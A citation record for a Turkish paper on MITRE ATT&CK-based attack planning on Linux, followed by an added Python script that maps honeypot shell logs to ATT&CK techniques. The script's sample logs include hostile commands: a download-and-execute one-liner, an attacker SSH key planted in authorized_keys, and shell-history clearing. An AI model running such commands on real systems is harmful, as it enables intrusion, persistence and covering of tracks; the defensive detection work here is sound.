TY - JOUR
T1 - LİNUX PLATFORMUNDA MITRE ATT&CK MATRİSİ KULLANARAK SALDIRI PLANLAMA VE UYGULAMA
TT - ATTACK PLANNING AND IMPLEMENTATION USING MITRE ATT&CK MATRIX ON LINUX PLATFORM
AU - Toksöz, Suat
AU - Turan, Metin
PY - 2025
DA - June
Y2 - 2024
DO - 10.55071/ticaretfbd.1572294
JF - İstanbul Ticaret Üniversitesi Fen Bilimleri Dergisi
PB - İstanbul Ticaret Üniversitesi
WT - DergiPark
SN - 1305-7820
SP - 84
EP - 134
VL - 24
IS - 47
LA - tr
AB - This article addresses the planning and execution of attacks on the Linux platform based on the MITRE ATT&CK matrix. The MITRE ATT&CK matrix is a framework developed to strengthen defensive mechanisms against cyber threats; it systematically classifies attackers' tactics, techniques and procedures. In the study, various attack scenarios are constructed on Linux-based systems using this matrix and the applicability of these scenarios is tested. Methods and tools that can be used to detect and prevent these attacks are also discussed. The study collects, analyzes and evaluates the logs of attacks captured by a honeypot. The results are presented to help cybersecurity professionals better understand the threats they may face on Linux platforms and to develop effective defense strategies against them.
KW - MITRE ATT&CK
KW - Cyber Security
KW - Attack Planning
KW - Attack Detection
KW - Defense Strategies
CR - Abbas-Escribano, M., & Debar, H. (2023). An Improved Honeypot Model for Attack Detection and Analysis. ACM International Conference Proceeding Series. doi:10.1145/3600160.3604993
CR - Afenu, D. S., Asiri, M., & Saxena, N. (2024). Industrial Control Systems Security Validation Based on MITRE Adversarial Tactics, Techniques, and Common Knowledge Framework. Electronics, 13(5). doi:10.3390/electronics13050917
CR - Al-Sada, B., Sadighian, A., & Oligeri, G. (2024). Analysis and Characterization of Cyber Threats Leveraging the MITRE ATT&CK Database. IEEE Access, 12. doi:10.1109/ACCESS.2023.3344680
CR - Amal, M. R., & Venkadesh, P. (2023). H-DOCTOR: Honeypot based firewall tuning for attack prevention. Measurement: Sensors, 25. doi:10.1016/j.measen.2022.100664
CR - Andrew, Y., Lim, C., & Budiarto, E. (2022). Mapping Linux Shell Commands to MITRE ATT&CK using NLP-Based Approach. Proceedings of the International Conference on Electrical Engineering and Informatics (ICELTICs 2022). doi:10.1109/ICELTICs56128.2022.9932097
CR - Ayala, G. (2024). Honeypot in a box: A distributed cluster network for honeypot deployment. Master's thesis (ICT for Smart Societies), Politecnico di Torino. Supervisors: M. Mellia and I. Drago.
CR - Georgiadou, A., Mouzakitis, S., & Askounis, D. (2021). Assessing MITRE ATT&CK risk using a cyber-security culture framework. Sensors, 21(9). doi:10.3390/s21093267
CR - Hobert, K., Lim, C., & Budiarto, E. (2023). Enhancing Cyber Attribution through Behavior Similarity Detection on Linux Shell Honeypots with ATT&CK Framework. Proceedings of the 2023 IEEE International Conference on Cryptography, Informatics, and Cybersecurity (ICoCICs 2023). doi:10.1109/ICoCICs58778.2023.10276639
CR - Hussein, M. A., & Hamza, E. K. (2022). Secure Mechanism Applied to Big Data for IIoT by Using Security Event and Information Management System (SIEM). International Journal of Intelligent Engineering and Systems, 15(6). doi:10.22266/ijies2022.1231.59
CR - Javadpour, A., Ja'fari, F., Taleb, T., Shojafar, M., & Benzaïd, C. (2024). A comprehensive survey on cyber deception techniques to improve honeypot performance. Computers & Security, 140. doi:10.1016/j.cose.2024.103792
CR - José, C., & Santander, M. (2024). Learning Models to Detect Personality Traits of Cyber Attackers: A Combined Approach Using Honeypot and Surveys. doi:10.1007/978-3.
CR - Kovar, R., & Paine, K. (2024). The CISO Report. Splunk. Retrieved 16 November 2024 from https://www.splunk.com/en_us/pdfs/gated/ebooks/the-ciso-report.pdf
CR - Koutsikos, I. (2024). Improving Infrastructure Security using Deceptive Technologies.
CR - Liao, M. L., Yu, C. L., Lai, Y. C., Chiu, S. P., & Chen, J. L. (2023). An Intelligent Cyber Threat Classification System. International Conference on Advanced Communication Technology (ICACT 2023). doi:10.23919/ICACT56868.2023.10079405
CR - MITRE ATT&CK. (2023). Techniques - Enterprise. MITRE ATT&CK®.
CR - Mohd Fuzi, M. F., Mazlan, M. F., Jamaluddin, M. N. F., & Halim, I. H. A. (2024). Performance analysis of network intrusion detection using T-Pot honeypots. Journal of Computing Research and Innovation, 9, 348–360. Retrieved 16 November 2024 from https://ir.uitm.edu.my/id/eprint/103968
CR - Muhammad, S., & Hafee, A. U. (2024). Investigating Threats to ICS and SCADA Systems via Honeypot Data Analysis and SIEM. Retrieved 16 November 2024 from https://www.researchgate.net/publication/382398394
CR - Mungsing, S., & Sringendee, K. (2024). Developing Proactive Cyber Threat Defense Systems on Server Computers Using Honeypot Techniques. International Journal of Engineering Research & Technology. http://www.ijert.org
CR - Palmer, D. (2024). Linux malware attacks are on the rise, and businesses aren't ready for it. ZDNet. Retrieved 16 November 2024 from https://www.zdnet.com/article/linux-malware-attacks-are-on-the-rise-and-businesses-arent-ready-for-it/
CR - Raghul, S. A., Gayathri, G., Bhatt, R., & Varun Kumar, K. A. (2024). Enhancing Cybersecurity Resilience: Integrating IDS with Advanced Honeypot Environments for Proactive Threat Detection. Proceedings of the 3rd International Conference on Applied Artificial Intelligence and Computing (ICAAIC 2024), IEEE, 1363–1368. doi:10.1109/ICAAIC60222.2024.10575865
CR - Rashid, S. M. Z. U., Haq, A., Hasan, S. T., Furhad, M. H., Ahmed, M., & Ullah, A. B. (2024). Faking smart industry: exploring cyber-threat landscape deploying cloud-based honeypot. Wireless Networks, 30(5). doi:10.1007/s11276-022-03057-y
CR - Rawat, S. (2024). Enhancing False Positive Detection in IDS/IPS Using Honeypots: A Case Study with CSE-CIC-2018 Dataset.
CR - Shrivastava, R. K., Bashir, B., & Hota, C. (2019). Attack detection and forensics using honeypot in IoT environment. Lecture Notes in Computer Science. doi:10.1007/978-3-030-05366-6_33
CR - Sikandar, H. S., Sikander, U., Anjum, A., & Khan, M. A. (2022). An Adversarial Approach: Comparing Windows and Linux Security Hardness Using Mitre ATT&CK Framework for Offensive Security. IEEE 19th International Conference on Smart Communities: Improving Quality of Life Using ICT, IoT and AI (HONET 2022). doi:10.1109/HONET56683.2022.10018981
CR - Singh, N., & Tripathy, S. (2024). It's too late if exfiltrate: Early stage Android ransomware detection. Computers & Security, 141. doi:10.1016/j.cose.2024.103819
CR - Srinivasa, S., Pedersen, L. M., & Vasilomanolakis, E. (2023). Gotta Catch 'em All: A Multistage Framework for Honeypot Fingerprinting. Digital Threats: Research and Practice, 4(3). doi:10.1145/3584976
CR - Xiong, W., Legrand, E., Åberg, O., & Lagerström, R. (2022). Cyber security threat modeling based on the MITRE Enterprise ATT&CK Matrix. Software and Systems Modeling, 21(1), 157–177. doi:10.1007/s10270-021-00898-7
CR - Yang, X., Yuan, J., Yang, H., Kong, Y., Zhang, H., & Zhao, J. (2023). A Highly Interactive Honeypot-Based Approach to Network Threat Management. Future Internet, 15(4). doi:10.3390/fi15040127
CR - Yousaf, A., & Zhou, J. (2024). From sinking to saving: MITRE ATT&CK and D3FEND frameworks for maritime cybersecurity. International Journal of Information Security. doi:10.1007/s10207-024-00812-4
CR - Zahid, H., Hina, S., Hayat, M. F., & Shah, G. A. (2023). Agentless Approach for Security Information and Event Management in Industrial IoT. Electronics, 12(8). doi:10.3390/electronics12081831
UR - https://doi.org/10.55071/ticaretfbd.1572294
L1 - https://dergipark.org.tr/tr/download/article-file/4309543
ER -
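The abstract describes classifying attacker behaviour on Linux with the ATT&CK matrix and analysing the logs a honeypot captures. The block below is an added example of that analysis step; it is not code from the paper or its authors. It parses constructed JSON log lines laid out in the field shape used by the Cowrie SSH honeypot (eventid, session, src_ip, input), splits each shell input into its chained commands, maps each command to an ATT&CK Enterprise technique ID with heuristic regexes, and summarises techniques per session and per tactic, skipping malformed lines instead of aborting. The technique IDs and names are real ATT&CK identifiers; the sample log lines, the regex rules and the field-layout assumption are this example's own, not an official mapping.

```python
"""Map honeypot shell activity on Linux to MITRE ATT&CK Enterprise technique IDs.

Added example, not code from the paper. The log lines below are constructed in
the JSON field layout of the Cowrie SSH honeypot (eventid, session, src_ip,
input); they are not data from the study. The regex rules are this example's
own heuristics, not an official ATT&CK mapping.
"""
import json
import re
from collections import defaultdict

# (technique id, technique name, tactic, regex applied to one shell command)
RULES = [
    ("T1033", "System Owner/User Discovery", "Discovery", r"^(whoami|id)\b"),
    ("T1082", "System Information Discovery", "Discovery",
     r"^(uname|lscpu|nproc|cat /proc/cpuinfo)\b"),
    ("T1016", "System Network Configuration Discovery", "Discovery",
     r"^(ifconfig|ip\s+(a|addr|route))\b"),
    ("T1057", "Process Discovery", "Discovery", r"^(ps|top)\b"),
    ("T1105", "Ingress Tool Transfer", "Command and Control", r"^(wget|curl|tftp|scp)\b"),
    ("T1222.002", "Linux and Mac File and Directory Permissions Modification",
     "Defense Evasion", r"^chmod\b"),
    ("T1070.003", "Clear Command History", "Defense Evasion",
     r"^history\s+-c|HISTFILE|\.bash_history"),
    ("T1562.004", "Disable or Modify System Firewall", "Defense Evasion",
     r"^(iptables|ufw|nft)\b"),
    ("T1136.001", "Local Account", "Persistence", r"^(useradd|adduser)\b"),
    ("T1098.004", "SSH Authorized Keys", "Persistence", r"authorized_keys"),
    ("T1053.003", "Cron", "Persistence", r"^crontab\b|/etc/cron"),
]
# Techniques assigned from the event type rather than from command text.
EVENT_TECHNIQUES = {
    "cowrie.login.failed": ("T1110.001", "Password Guessing", "Credential Access"),
    "cowrie.login.success": ("T1078", "Valid Accounts", "Initial Access"),
}
SHELL = ("T1059.004", "Unix Shell", "Execution")  # every command input runs in a shell
TACTIC_OF = {tid: tactic for tid, _n, tactic, _p in RULES}
TACTIC_OF.update({tid: tactic for tid, _n, tactic in EVENT_TECHNIQUES.values()})
TACTIC_OF[SHELL[0]] = SHELL[2]
COMPILED = [(tid, re.compile(pat)) for tid, _n, _t, pat in RULES]
# ';', '&&', '||' and '|' chain commands; each piece is classified on its own.
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")


def split_commands(line):
    return [part.strip() for part in SEPARATORS.split(line) if part.strip()]


def classify_command(line):
    """Return the sorted ATT&CK IDs for one shell input line."""
    hits = {SHELL[0]}
    for part in split_commands(line):
        hits.update(tid for tid, rx in COMPILED if rx.search(part))
    return sorted(hits)


def parse_events(lines):
    """Parse JSON log lines; a malformed line is counted and skipped, not fatal."""
    events, unparsed = [], 0
    for raw in lines:
        try:
            events.append(json.loads(raw))
        except json.JSONDecodeError:
            unparsed += 1
    return events, unparsed


def analyze(lines):
    """Aggregate techniques per session and per tactic from raw log lines."""
    events, unparsed = parse_events(lines)
    sessions = defaultdict(lambda: {"src_ip": None, "failed_logins": 0, "techniques": set()})
    for ev in events:
        sess = sessions[ev.get("session", "?")]
        sess["src_ip"] = ev.get("src_ip", sess["src_ip"])
        eid = ev.get("eventid", "")
        if eid == "cowrie.login.failed":
            sess["failed_logins"] += 1
        if eid in EVENT_TECHNIQUES:
            sess["techniques"].add(EVENT_TECHNIQUES[eid][0])
        elif eid == "cowrie.command.input":
            sess["techniques"].update(classify_command(ev.get("input", "")))
    tactics = defaultdict(set)
    for sess in sessions.values():
        for tid in sess["techniques"]:
            tactics[TACTIC_OF[tid]].add(tid)
        sess["techniques"] = sorted(sess["techniques"])
    return {"sessions": dict(sessions), "tactics": dict(tactics), "unparsed": unparsed}


# Constructed sample: two SSH sessions plus one corrupted line (not real captures).
SAMPLE_LOGS = [
    '{"eventid":"cowrie.login.failed","session":"a1","src_ip":"203.0.113.7","username":"root","password":"123456"}',
    '{"eventid":"cowrie.login.failed","session":"a1","src_ip":"203.0.113.7","username":"root","password":"admin"}',
    '{"eventid":"cowrie.login.success","session":"a1","src_ip":"203.0.113.7","username":"root","password":"toor"}',
    '{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.7","input":"uname -a; whoami"}',
    '{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.7","input":"wget http://198.51.100.9/x.sh -O /tmp/x.sh && chmod +x /tmp/x.sh && /tmp/x.sh"}',
    '{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.7","input":"echo ssh-rsa AAAAB3NzaC1yc2E attacker >> ~/.ssh/authorized_keys"}',
    '{"eventid":"cowrie.command.input","session":"a1","src_ip":"203.0.113.7","input":"history -c; unset HISTFILE"}',
    '{"eventid":"cowrie.command.input","session":"b2","src_ip":"192.0.2.44","input":"cat /proc/cpuinfo | grep name"}',
    "this line is not json",
]

if __name__ == "__main__":
    report = analyze(SAMPLE_LOGS)
    for sid, sess in report["sessions"].items():
        print(sid, sess["src_ip"], "failed logins:", sess["failed_logins"], sess["techniques"])
    for tactic, tids in sorted(report["tactics"].items()):
        print(f"{tactic}: {sorted(tids)}")
    print("unparsed lines:", report["unparsed"])
```

Splitting on the shell's chaining operators matters in practice: a typical post-login one-liner (download, chmod, execute) would otherwise be scored as a single download event, and the Defense Evasion step would be missed. The per-tactic summary is the view that lines up directly with the columns of the ATT&CK matrix, which is what makes the honeypot data comparable with the attack scenarios planned from the matrix.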